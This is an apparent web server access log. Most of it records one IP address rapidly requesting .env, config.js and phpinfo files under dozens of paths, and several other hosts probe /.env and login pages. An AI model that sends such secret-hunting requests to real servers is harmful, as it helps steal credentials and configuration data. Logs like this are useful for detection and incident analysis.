104.248.149.104 - - [11/Apr/2023:10:02:18 +0000] "GET /server/config.js HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:19 +0000] "GET /server/config/plugins.js HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:19 +0000] "GET /server/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:20 +0000] "GET /server/index.js HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:21 +0000] "GET /server_info.php HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:21 +0000] "GET /server/src/email.js HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:22 +0000] "GET /sessions/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:23 +0000] "GET /shared/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:24 +0000] "GET /shibboleth/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:24 +0000] "GET /shop/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:25 +0000] "GET /shopify/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:26 +0000] "GET /sirim/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:26 +0000] "GET /site/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:27 +0000] "GET /sitemaps/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:28 +0000] "GET /sites/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:29 +0000] "GET /sitestatic/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:29 +0000] "GET /src/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:30 +0000] "GET /src/PHPInfo.php HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:31 +0000] "GET /stag/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:32 +0000] "GET /staging/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:32 +0000] "GET /static/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:33 +0000] "GET /staticfiles/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:34 +0000] "GET /static-html/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:34 +0000] "GET /static_prod/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:35 +0000] "GET /static_user/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:36 +0000] "GET /stats/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:37 +0000] "GET /stockapi/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:37 +0000] "GET /storage/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:38 +0000] "GET /store/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:39 +0000] "GET /stripe/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:39 +0000] "GET /stripe-php/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:40 +0000] "GET /style/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:41 +0000] "GET /styles/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:42 +0000] "GET /stylesheets/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:42 +0000] "GET /subdomains/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:43 +0000] "GET /supermind/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:44 +0000] "GET /support/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:45 +0000] "GET /symfony/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:45 +0000] "GET /sys_phpinfo.php HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:46 +0000] "GET /system-config/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:47 +0000] "GET /system/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:47 +0000] "GET /target/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:48 +0000] "GET /task_api/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:49 +0000] "GET /template/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:50 +0000] "GET /templates/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:50 +0000] "GET /test1/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:51 +0000] "GET /test/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:52 +0000] "GET /test.php HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:53 +0000] "GET /tests/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:53 +0000] "GET /theme/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:54 +0000] "GET /thumb/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:55 +0000] "GET /thumbs/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:55 +0000] "GET /tmp/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:56 +0000] "GET /tool/phpinfo.php HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:57 +0000] "GET /tools/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:58 +0000] "GET /tps/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:58 +0000] "GET /tvm/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:02:59 +0000] "GET /ubuntu/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:00 +0000] "GET /upfiles/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:01 +0000] "GET /upload/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:02 +0000] "GET /uploads/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:02 +0000] "GET /User_info/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:03 +0000] "GET /v1/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:04 +0000] "GET /v2/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:05 +0000] "GET /var/backup/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:05 +0000] "GET /vendor/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:06 +0000] "GET /videos/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:07 +0000] "GET /web/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:08 +0000] "GET /web-files/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:08 +0000] "GET /webserver/config/config.js HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:09 +0000] "GET /WebServer/config/config.js HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:10 +0000] "GET /webservice/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:10 +0000] "GET /website/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:11 +0000] "GET /workspace/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:12 +0000] "GET /wp/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:13 +0000] "GET /www/.env HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:13 +0000] "POST / HTTP/1.1" 405 425672 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.248.149.104 - - [11/Apr/2023:10:03:16 +0000] "GET / HTTP/1.1" 200 8444 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
193.32.162.159 - - [11/Apr/2023:10:13:07 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [11/Apr/2023:10:39:26 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
192.155.90.220 - - [11/Apr/2023:10:55:48 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.189 - - [11/Apr/2023:11:00:57 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [11/Apr/2023:11:00:57 +0000] "POST / HTTP/1.1" 405 409736 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.203.4.167 - - [11/Apr/2023:11:05:12 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36"
34.140.130.61 - - [11/Apr/2023:11:11:31 +0000] "GET / HTTP/1.1" 200 8384 "-" "python-requests/2.28.2"
43.154.128.189 - - [11/Apr/2023:11:58:01 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
167.248.133.38 - - [11/Apr/2023:12:10:55 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
167.248.133.38 - - [11/Apr/2023:12:10:56 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.38 - - [11/Apr/2023:12:10:57 +0000] "PRI * HTTP/2.0" 400 226 "-" "-"
167.248.133.38 - - [11/Apr/2023:12:10:57 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.38 - - [11/Apr/2023:12:10:58 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.38 - - [11/Apr/2023:12:10:58 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
193.32.162.159 - - [11/Apr/2023:12:20:56 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.211.220.126 - - [11/Apr/2023:12:38:40 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.211.220.126 - - [11/Apr/2023:12:38:41 +0000] "POST / HTTP/1.1" 405 409716 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
152.32.227.252 - - [11/Apr/2023:13:00:42 +0000] "\x16\x03\x01\x01\t\x01" 400 226 "-" "-"
152.32.227.252 - - [11/Apr/2023:13:00:53 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
152.32.227.252 - - [11/Apr/2023:13:01:12 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.227.252 - - [11/Apr/2023:13:01:15 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.227.252 - - [11/Apr/2023:13:01:16 +0000] "GET /sitemap.xml HTTP/1.1" 200 429 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.227.252 - - [11/Apr/2023:13:01:19 +0000] "GET /assets/front/10bucksonly/js/jQuery.min.v3.5.1.js HTTP/1.1" 200 30908 "-" "Go-http-client/1.1"
152.32.227.252 - - [11/Apr/2023:13:01:19 +0000] "GET /assets/admin/base/js/toastr.min.js HTTP/1.1" 200 2013 "-" "Go-http-client/1.1"
152.32.227.252 - - [11/Apr/2023:13:01:19 +0000] "GET /assets/front/10bucksonly/plugins/owl.carousel/owl.carousel.min.js HTTP/1.1" 200 11412 "-" "Go-http-client/1.1"
152.32.227.252 - - [11/Apr/2023:13:01:19 +0000] "GET /assets/front/10bucksonly/js/main.js HTTP/1.1" 200 1672 "-" "Go-http-client/1.1"
